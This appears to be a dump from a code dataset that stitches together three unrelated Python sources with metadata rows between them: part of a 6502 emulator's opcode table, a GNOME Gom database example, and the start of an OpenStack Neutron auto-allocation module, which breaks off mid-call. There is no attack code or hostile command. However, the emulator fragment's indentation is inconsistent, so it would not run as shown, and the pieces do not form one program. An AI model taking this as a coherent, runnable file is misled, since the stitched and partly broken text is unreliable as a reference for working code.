self.instruction_lookup[0x2C] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.BIT_exec)
# CMP
self.instruction_lookup[0xC1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xC9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xC5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xCD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xDD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.CMP_exec)
self.instruction_lookup[0xD9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.CMP_exec)
# CPX
self.instruction_lookup[0xE0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CPX_exec)
self.instruction_lookup[0xE4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CPX_exec)
self.instruction_lookup[0xEC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CPX_exec)
# CPY
self.instruction_lookup[0xC0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.CPY_exec)
self.instruction_lookup[0xC4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.CPY_exec)
self.instruction_lookup[0xCC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.CPY_exec)
# DEC
self.instruction_lookup[0xC6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xD6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xCE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.DEC_exec)
self.instruction_lookup[0xDE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.DEC_exec)
# EOR
self.instruction_lookup[0x41] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x49] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x45] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x55] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x51] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x4D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x5D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.EOR_exec)
self.instruction_lookup[0x59] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.EOR_exec)
# INC
self.instruction_lookup[0xE6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xF6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xEE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.INC_exec)
self.instruction_lookup[0xFE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.INC_exec)
# LDA
self.instruction_lookup[0xA1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xA9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xA5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xAD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xBD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.LDA_exec)
self.instruction_lookup[0xB9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LDA_exec)
# LDX
self.instruction_lookup[0xA2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xA6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xB6] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xAE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDX_exec)
self.instruction_lookup[0xBE] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LDX_exec)
# LDY
self.instruction_lookup[0xA0] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xA4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xB4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xAC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LDY_exec)
self.instruction_lookup[0xBC] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.LDY_exec)
# LSR
self.instruction_lookup[0x46] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x56] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x4E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.LSR_exec)
self.instruction_lookup[0x5E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.LSR_exec)
        # ORA (the 6502 mnemonic; implemented here as OR_exec)
self.instruction_lookup[0x01] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x09] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x05] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x15] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x11] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x0D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x1D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.OR_exec)
self.instruction_lookup[0x19] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.OR_exec)
# ROL
self.instruction_lookup[0x26] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x36] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x2E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x3E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ROL_exec)
self.instruction_lookup[0x2A] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAcc, self.aR, self.aW, self.instruction_exe.ROL_exec)
# ROR
self.instruction_lookup[0x66] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x76] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x6E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x7E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.ROR_exec)
self.instruction_lookup[0x6A] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAcc, self.aR, self.aW, self.instruction_exe.ROR_exec)
# SBC
self.instruction_lookup[0xE1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xE9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xE5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF5] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF1] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xED] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xFD] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.nullW, self.instruction_exe.SBC_exec)
self.instruction_lookup[0xF9] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.SBC_exec)
# STA
self.instruction_lookup[0x81] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x85] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x95] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x91] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
self.instruction_lookup[0x8D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STA_exec)
self.instruction_lookup[0x9D] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
self.instruction_lookup[0x99] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.nullR, self.regW, self.instruction_exe.STA_exec, self.pc_state.CYCLES_TO_CLOCK)
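        # (The extra CYCLES_TO_CLOCK argument on the indexed stores above is
        # consistent with the 6502 rule that an indexed write always pays the
        # page-cross penalty cycle, whereas an indexed read pays it only when
        # a page boundary is actually crossed.)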
# SAX
self.instruction_lookup[0x83] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x87] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x8F] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.SAX_exec)
self.instruction_lookup[0x97] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.nullR, self.regW, self.instruction_exe.SAX_exec)
# STX
self.instruction_lookup[0x86] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STX_exec)
self.instruction_lookup[0x96] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.nullR, self.regW, self.instruction_exe.STX_exec)
self.instruction_lookup[0x8E] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STX_exec)
# STY
self.instruction_lookup[0x84] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.STY_exec)
self.instruction_lookup[0x94] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.STY_exec)
self.instruction_lookup[0x8C] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.nullR, self.regW, self.instruction_exe.STY_exec)
# DCP
self.instruction_lookup[0xC3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xC7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xD7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xD3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xCF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xDF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbx, self.r, self.w, self.instruction_exe.DCP_exec)
self.instruction_lookup[0xDB] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.w, self.instruction_exe.DCP_exec)
# JSR
self.instruction_lookup[0x20] = instructions.JumpSubRoutineInstruction(self.clocks, self.pc_state, self.memory, None)
        # Branch
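        # Each branch below is registered with a status-register mask and the
        # value the masked bits must equal for the branch to be taken. A
        # sketch of the check (assuming BranchInstruction compares this way):
        #     taken = (P & mask) == condition
        # e.g. BNE (0xD0): mask=0x02 selects the Z flag and condition=0x00,
        # so the branch is taken when Z == 0.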
# BPL case 0x10: if (self.pc_state.P.status.N == 0)
self.instruction_lookup[0x10] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x80, 0x00, None)
# BMI case 0x30: if (self.pc_state.P.status.N == 1)
self.instruction_lookup[0x30] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x80, 0x80, None)
# BVC case 0x50: if (self.pc_state.P.status.V == 0)
self.instruction_lookup[0x50] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x40, 0x00, None)
# BVS case 0x70: if (self.pc_state.P.status.V == 1)
self.instruction_lookup[0x70] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x40, 0x40, None)
# BCC case 0x90: if (self.pc_state.P.status.C == 0)
self.instruction_lookup[0x90] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x01, 0x00, None)
# BCS case 0xB0: if (self.pc_state.P.status.C == 1)
self.instruction_lookup[0xB0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x01, 0x01, None)
        # BNE case 0xD0: if (self.pc_state.P.status.Z == 0); adds 2*CYCLES_TO_CLOCK when taken
self.instruction_lookup[0xD0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x02, 0x00, None)
        # BEQ case 0xF0: if (self.pc_state.P.status.Z == 1)
self.instruction_lookup[0xF0] = instructions.BranchInstruction(self.clocks, self.pc_state, self.memory, 0x02, 0x02, None)
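        # RTI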
self.instruction_lookup[0x40] = instructions.ReturnFromInterrupt(self.clocks, self.pc_state, self.memory, None)
# RTS
self.instruction_lookup[0x60] = instructions.ReturnFromSubRoutineInstruction(self.clocks, self.pc_state, self.memory, None)
# JMP, absolute (effectively immediate)
self.instruction_lookup[0x4C] = instructions.JumpInstruction(self.clocks, self.pc_state, self.aAbs, None)
# JMP, indirect (effectively absolute)
self.instruction_lookup[0x6C] = instructions.JumpInstruction(self.clocks, self.pc_state, self.aInd, None)
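        # (On a real 6502, indirect JMP has a page-wrap quirk: JMP ($xxFF)
        # fetches the high byte from $xx00 instead of crossing the page;
        # whether aInd reproduces that is up to this implementation.)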
# PHP
self.instruction_lookup[0x08] = instructions.PHPInstruction(self.clocks, self.pc_state, self.memory, None)
# PLP
self.instruction_lookup[0x28] = instructions.PLPInstruction(self.clocks, self.pc_state, self.memory, None)
# PHA
self.instruction_lookup[0x48] = instructions.PHAInstruction(self.clocks, self.pc_state, self.memory, None)
# PLA
self.instruction_lookup[0x68] = instructions.PLAInstruction(self.clocks, self.pc_state, self.memory, None)
        # Illegal instructions
# SLO
self.instruction_lookup[0x07] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.SLO_exec)
# Undocumented instructions
self.instruction_lookup[0x04] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x14] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x34] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x44] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x54] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x64] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x74] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x80] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x82] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0x89] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xC2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xD4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xE2] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.nullR, self.regW, self.instruction_exe.NOP_exec)
self.instruction_lookup[0xF4] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPX, self.nullR, self.regW, self.instruction_exe.NOP_exec)
# LAX
self.instruction_lookup[0xA7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZP, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xB7] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aZPY, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xAF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAbs, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xBF] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aAby, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xA3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZX, self.r, self.nullW, self.instruction_exe.LAX_exec)
self.instruction_lookup[0xB3] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIZY, self.r, self.nullW, self.instruction_exe.LAX_exec)
# ASR
self.instruction_lookup[0x4B] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.ASR_exec)
# SBX
self.instruction_lookup[0xCB] = instructions.ReadWriteInstruction(self.clocks, self.pc_state, self.aIMM, self.r, self.nullW, self.instruction_exe.SBX_exec)
|
mit
| -1,423,468,789,650,102,000
| 94.933333
| 197
| 0.734132
| false
| 3.081096
| false
| false
| false
|
GNOME/gom
|
examples/gom.py
|
1
|
2292
|
#!/usr/bin/python3
from gi.types import GObjectMeta
from gi.repository import GLib
from gi.repository import GObject
from gi.repository import Gom
# Need a metaclass until we get something like _gclass_init_
# https://bugzilla.gnome.org/show_bug.cgi?id=701843
class ItemResourceMeta(GObjectMeta):
def __init__(cls, name, bases, dct):
super(ItemResourceMeta, cls).__init__(name, bases, dct)
cls.set_table("items")
cls.set_primary_key("id")
cls.set_notnull("name")
class ItemResource(Gom.Resource, metaclass=ItemResourceMeta):
id = GObject.Property(type=int)
name = GObject.Property(type=str)
if __name__ == '__main__':
# Connect to the database
adapter = Gom.Adapter()
adapter.open_sync(":memory:")
# Create the table
repository = Gom.Repository(adapter=adapter)
repository.automatic_migrate_sync(1, [ItemResource])
# Insert an item
item = ItemResource(repository=repository, name="item1")
item.save_sync()
# Fetch the item back
item = repository.find_one_sync(ItemResource, None)
assert item.id == 1
assert item.name == 'item1'
# Insert a new item
item = ItemResource(repository=repository, name="item2")
item.save_sync()
# Fetch them all with a None filter, ordered by name
names = ['item2', 'item1']
sorting = Gom.Sorting(ItemResource, "name", Gom.SortingMode.DESCENDING)
group = repository.find_sorted_sync(ItemResource, None, sorting)
count = len(group)
assert count == 2
group.fetch_sync(0, count)
for i, item in enumerate(group):
assert item.name == names[i]
# Fetch only one of them with a filter, asynchronously
loop = GLib.MainLoop()
def fetch_cb(group, result, user_data):
group.fetch_finish(result)
item = group[0]
assert item.name == "item2"
# Close the database
adapter.close_sync()
loop.quit()
def find_cb(repository, result, user_data):
group = repository.find_finish(result)
count = len(group)
assert count == 1
group.fetch_async(0, count, fetch_cb, None)
filter = Gom.Filter.new_eq(ItemResource, "name", "item2")
    repository.find_async(ItemResource, filter, find_cb, None)
loop.run()
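    # For comparison, a synchronous sketch of the same find/fetch (same Gom
    # API as above; find_sync is assumed to mirror find_async):
    #     group = repository.find_sync(ItemResource, filter)
    #     group.fetch_sync(0, len(group))
    #     assert group[0].name == "item2"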
|
lgpl-2.1
| -4,386,300,202,051,084,300
| 26.614458
| 75
| 0.654014
| false
| 3.603774
| false
| false
| false
|
eayunstack/neutron
|
neutron/services/auto_allocate/db.py
|
1
|
16534
|
# Copyright 2015-2016 Hewlett Packard Enterprise Development Company, LP
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.api.definitions import network as net_def
from neutron_lib.callbacks import events
from neutron_lib.callbacks import registry
from neutron_lib.callbacks import resources
from neutron_lib import exceptions as n_exc
from neutron_lib.objects import exceptions as obj_exc
from neutron_lib.plugins import constants
from neutron_lib.plugins import directory
from oslo_log import log as logging
from neutron._i18n import _
from neutron.common import exceptions as c_exc
from neutron.db import _resource_extend as resource_extend
from neutron.db import _utils as db_utils
from neutron.db import api as db_api
from neutron.db import common_db_mixin
from neutron.extensions import l3
from neutron.objects import auto_allocate as auto_allocate_obj
from neutron.objects import base as base_obj
from neutron.objects import network as net_obj
from neutron.plugins.common import utils as p_utils
from neutron.services.auto_allocate import exceptions
LOG = logging.getLogger(__name__)
IS_DEFAULT = 'is_default'
CHECK_REQUIREMENTS = 'dry-run'
@db_api.retry_if_session_inactive()
def _ensure_external_network_default_value_callback(
resource, event, trigger, context, request, network, **kwargs):
"""Ensure the is_default db field matches the create/update request."""
is_default = request.get(IS_DEFAULT)
if is_default is None:
return
if is_default:
# ensure there is only one default external network at any given time
pager = base_obj.Pager(limit=1)
objs = net_obj.ExternalNetwork.get_objects(context,
_pager=pager, is_default=True)
if objs:
if objs[0] and network['id'] != objs[0].network_id:
raise exceptions.DefaultExternalNetworkExists(
net_id=objs[0].network_id)
orig = kwargs.get('original_network')
if orig and orig.get(IS_DEFAULT) == is_default:
return
network[IS_DEFAULT] = is_default
# Reflect the status of the is_default on the create/update request
obj = net_obj.ExternalNetwork.get_object(context,
network_id=network['id'])
if obj:
obj.is_default = is_default
obj.update()
@resource_extend.has_resource_extenders
class AutoAllocatedTopologyMixin(common_db_mixin.CommonDbMixin):
def __new__(cls, *args, **kwargs):
# NOTE(kevinbenton): we subscribe on object construction because
# the tests blow away the callback manager for each run
new = super(AutoAllocatedTopologyMixin, cls).__new__(cls, *args,
**kwargs)
registry.subscribe(_ensure_external_network_default_value_callback,
resources.NETWORK, events.PRECOMMIT_UPDATE)
registry.subscribe(_ensure_external_network_default_value_callback,
resources.NETWORK, events.PRECOMMIT_CREATE)
return new
# TODO(armax): if a tenant modifies auto allocated resources under
# the hood the behavior of the get_auto_allocated_topology API is
# undetermined. Consider adding callbacks to deal with the following
# situations:
# - insert subnet -> plug router interface
# - delete router -> remove the entire topology
# - update subnet -> prevent operation
# - update router gateway -> prevent operation
# - ...
@property
def core_plugin(self):
if not getattr(self, '_core_plugin', None):
self._core_plugin = directory.get_plugin()
return self._core_plugin
@property
def l3_plugin(self):
if not getattr(self, '_l3_plugin', None):
self._l3_plugin = directory.get_plugin(constants.L3)
return self._l3_plugin
@staticmethod
@resource_extend.extends([net_def.COLLECTION_NAME])
def _extend_external_network_default(net_res, net_db):
"""Add is_default field to 'show' response."""
if net_db.external is not None:
net_res[IS_DEFAULT] = net_db.external.is_default
return net_res
def get_auto_allocated_topology(self, context, tenant_id, fields=None):
"""Return tenant's network associated to auto-allocated topology.
The topology will be provisioned upon return, if network is missing.
"""
fields = fields or []
tenant_id = self._validate(context, tenant_id)
if CHECK_REQUIREMENTS in fields:
# for dry-run requests, simply validates that subsequent
# requests can be fulfilled based on a set of requirements
# such as existence of default networks, pools, etc.
return self._check_requirements(context, tenant_id)
elif fields:
raise n_exc.BadRequest(resource='auto_allocate',
msg=_("Unrecognized field"))
# Check for an existent topology
network_id = self._get_auto_allocated_network(context, tenant_id)
if network_id:
return self._response(network_id, tenant_id, fields=fields)
# See if we indeed have an external network to connect to, otherwise
# we will fail fast
default_external_network = self._get_default_external_network(
context)
# If we reach this point, then we got some work to do!
network_id = self._build_topology(
context, tenant_id, default_external_network)
return self._response(network_id, tenant_id, fields=fields)
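    # A usage sketch for the dry-run branch above (caller and context are
    # illustrative assumptions):
    #     plugin.get_auto_allocated_topology(
    #         ctx, tenant_id, fields=[CHECK_REQUIREMENTS])
    # returns {'id': 'dry-run=pass', ...} without provisioning anything.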
def delete_auto_allocated_topology(self, context, tenant_id):
tenant_id = self._validate(context, tenant_id)
topology = self._get_auto_allocated_topology(context, tenant_id)
if topology:
subnets = self.core_plugin.get_subnets(
context,
